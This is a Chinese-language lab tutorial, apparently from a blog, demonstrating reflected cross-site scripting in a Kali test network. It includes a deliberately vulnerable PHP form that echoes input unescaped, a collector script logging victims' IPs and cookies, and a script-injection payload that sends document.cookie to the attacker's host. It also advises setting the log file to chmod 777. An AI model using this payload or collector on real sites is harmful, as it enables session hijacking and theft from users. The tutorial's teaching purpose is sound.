脚本攻击XSS (cross site scripting)"/>
跨站脚本攻击XSS (cross site scripting)
跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。
实验目的
进行一个xss跨站脚本攻击,获取目标的IP和Cookie信息。
实验环境
桥接模式下的KALI、物理机或者同NAT模式下的两台虚拟机
实验过程
1.在KALi的网站目录下创建两个php文件
(1) submit.php
<?php
session_start();
?>
<!doctype html>
<html><head><title>XSS Demo</title></head><body><form><input style="width:300px;" type="text" name="address1" value="<?php echo $_GET["address1"]; ?>" /><input type="submit" value="submit" /></form></body>
</html>
(2)hack.php
<?php
$victim = 'XXS get the cookie:'. $_SERVER['REMOTE_ADDR']. ':' .$_GET['cookie'];
file_put_contents("1.txt", "$victim");
echo welcome;
?>
保存好放入/var/www/html目录下
2.进入网站提交恶意代码
(1)打开kali的apache服务
service apache2 start
(2)在网页测试一下是否开启服务也可以通过nmap扫描自己的端口判断
3.进入http://192.168.x.x/submit.php,在输入框中输入恶意的代码
(1)在此之前先修改一下浏览器的安全设置
(2)提交恶意代码
"/> <script>window.open("http://192.168.2.123/hack.php?cookie="+document.cookie); </script><!--
4.提交之后跳转进入hack.php
(1)到1.txt查看是否写入受害者的IP和Cookie
(2)这里并没有写入,分析原因:代码检查过了一遍没有问题,安全设置也设置了,那么可能的原因就是文件写入权限的问题。
(3)解决办法,打kali终端输入
cd /var/www/html #进入网站目录ls -ll #查看文件权限chmod 777 /var/www/html/1.txt #修改1.txt文件的权限
这样写入问题解决。
5.打开1.txt文件查看到受害者的IP和Cookie信息
实验完毕
更多推荐
跨站脚本攻击XSS (cross site scripting)
发布评论